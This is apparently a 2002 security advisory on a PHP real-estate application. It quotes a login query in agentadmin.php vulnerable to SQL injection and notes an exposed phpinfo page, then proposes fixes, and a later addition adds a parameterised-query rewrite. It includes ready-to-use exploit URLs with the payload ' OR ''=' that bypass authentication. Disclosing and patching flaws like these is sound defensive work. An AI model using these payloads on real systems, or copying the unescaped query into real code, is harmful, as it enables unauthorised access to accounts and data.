Information :
°°°°°°°°°°°°°
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
agentadmin.php :
--------------------------------------------------------------
[...]
} elseif ($agentname != "" OR $current_user != "") {
    // $agentname and $agentpassword are request values placed in the query unescaped
    $sql = "SELECT id FROM agents WHERE agent='$agentname' and agentpass='$agentpassword'";
    $result = mysql_query($sql) or die("Couldn't execute query.");
    $num = mysql_numrows($result);
    if ($num == 1) {
        session_register("agentname");
        session_register("agentpassword");
        [...]
        session_register("current_user");
        session_register("agent");
[...]
--------------------------------------------------------------

admin/phpinfo.php :
-----------
<? phpinfo(); ?>
-----------

Exploits :
°°°°°°°°°°
http://[target]/agentadmin.php?agentname='%20OR%20''='&agentpassword='%20OR%20''='
or
http://[target]/agentadmin.php?agentname=[USERNAME]&agentpasword='%20OR%20''='

http://[target]/admin/phpinfo.php

Solutions :
°°°°°°°°°°°
- Delete /admin/phpinfo.php
- Put these lines :
------------------------------------------
$agentname=addslashes($agentname);
$currentuser=addslashes($currentuser);
$agentpassword=addslashes($agentpassword);
------------------------------------------
into common.php.

A patch can be found on http://www.phpsecure.org.

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/Immoblier.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n
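Added example, not part of the original advisory or the application's code: the login lookup from agentadmin.php rewritten with bound parameters, so the request values never become part of the SQL text and no escaping step such as addslashes() is needed. It assumes PDO with the pdo_sqlite driver standing in for the MySQL connection; open_demo_db(), check_agent_login() and the sample agent row are hypothetical names and constructed data.

```php
<?php
// Added example, not the application's code. PDO with an in-memory SQLite
// database stands in for the MySQL connection; the agent row is constructed.

function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE agents (id INTEGER PRIMARY KEY, agent TEXT, agentpass TEXT)');
    $db->prepare('INSERT INTO agents (agent, agentpass) VALUES (?, ?)')
       ->execute(['alice', 's3cret-sample']);
    return $db;
}

// Same lookup as agentadmin.php, with the request values bound as parameters.
// Returns the agent id on a match, null otherwise.
function check_agent_login(PDO $db, $agentname, $agentpassword): ?int
{
    // Reject array-valued parameters such as ?agentname[]=x before querying.
    if (!is_string($agentname) || !is_string($agentpassword)) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT id FROM agents WHERE agent = :agent AND agentpass = :pass'
    );
    $stmt->execute([':agent' => $agentname, ':pass' => $agentpassword]);
    $rows = $stmt->fetchAll(PDO::FETCH_COLUMN);
    // Like the original, accept only when exactly one row matches.
    return count($rows) === 1 ? (int) $rows[0] : null;
}

$db = open_demo_db();
$cases = [
    ['alice', 's3cret-sample'],   // valid constructed credentials
    ["' OR ''='", "' OR ''='"],   // the values from the advisory's first URL
    ['alice', "' OR ''='"],       // the values from the second URL
];
foreach ($cases as [$name, $pass]) {
    $id = check_agent_login($db, $name, $pass);
    printf("%-12s => %s\n", $name, $id === null ? 'rejected' : "agent id $id");
}
```

With bound parameters the quote characters in the advisory's inputs are compared as literal data, so only the first case authenticates.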
This archive was generated by hypermail 2b30 : Tue Nov 26 2002 - 01:49:58 PST